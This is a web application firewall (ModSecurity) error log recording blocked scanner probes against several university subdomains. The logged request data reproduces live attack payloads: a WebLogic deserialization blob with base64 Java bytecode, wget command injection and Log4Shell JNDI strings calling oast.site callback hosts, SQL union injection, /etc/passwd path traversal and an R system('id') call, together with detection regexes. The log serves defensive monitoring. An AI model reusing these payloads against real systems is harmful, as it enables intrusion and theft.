[Tue Aug 29 11:34:26.336343 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUKg@wAAABC"]
[Tue Aug 29 11:34:26.355854 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgg8ie8pofoig68.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUa3A4AAABP"]
[Tue Aug 29 11:34:26.360320 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAThz-4AAAAm"]
[Tue Aug 29 11:34:26.367919 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlga49qe157i3mmj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUOaSkAAABG"]
[Tue Aug 29 11:34:26.368555 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgstqycbr5ney6s.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUR82YAAABI"]
[Tue Aug 29 11:34:26.372026 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAT@KuAAAAA2"]
[Tue Aug 29 11:34:26.382575 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgnid48arom9n16.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUIz6EAAABA"]
[Tue Aug 29 11:34:26.385707 2023] [:error] [pid 1301] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgzix7t3z9te84g.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUVDNMAAABL"]
[Tue Aug 29 11:34:26.394238 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUfi8AAAABU"]
[Tue Aug 29 11:34:27.541670 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUYm7sAAABN"]
[Tue Aug 29 11:34:27.633642 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUMVLkAAABE"]
[Tue Aug 29 11:34:27.698932 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAATavtUAAAAg"]
[Tue Aug 29 11:34:27.789281 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUZcEMAAABO"]
[Tue Aug 29 11:34:27.792585 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUeP7cAAABT"]
[Tue Aug 29 11:34:28.058528 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "informatika.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAAT@KuIAAAA2"]
[Tue Aug 29 11:34:28.105030 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "pusatbahasa.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAATovmAAAAAt"]
[Tue Aug 29 11:34:28.142315 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "ft.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAATTmQ4AAAAV"]
[Tue Aug 29 11:34:28.171361 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUa3BEAAABP"]
[Tue Aug 29 11:34:28.227053 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "journal.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAATusz0AAAAv"]
[Tue Aug 29 11:34:28.330738 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11VMCo-f0AAAUXLhQAAABM"]
[Tue Aug 29 11:34:28.361724 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11VMCo-f0AAATSkmcAAAAT"]
[Tue Aug 29 11:34:29.331160 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgqmti651j1keeo.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATqf7AAAAAu"]
[Tue Aug 29 11:34:29.331797 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUMVLsAAABE"]
[Tue Aug 29 11:34:29.331855 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgn5rhufshrgkmz.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAUIz6QAAABA"]
[Tue Aug 29 11:34:29.332319 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgdahes56srzkzp.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATOA8wAAAAH"]
[Tue Aug 29 11:34:29.338938 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgxdaur5d41ti37.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAASGMwoAAAAA"]
[Tue Aug 29 11:34:29.350399 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgdrhz991yu8w8s.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAASI0DMAAAAG"]
[Tue Aug 29 11:34:29.366708 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATmZcMAAAAr"]
[Tue Aug 29 11:34:29.367059 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUbgzgAAABQ"]
[Tue Aug 29 11:34:29.367365 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAT-IXUAAAA3"]
[Tue Aug 29 11:34:29.368216 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAASS8BIAAAAY"]
[Tue Aug 29 11:34:29.412301 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAUfi8IAAABU"]
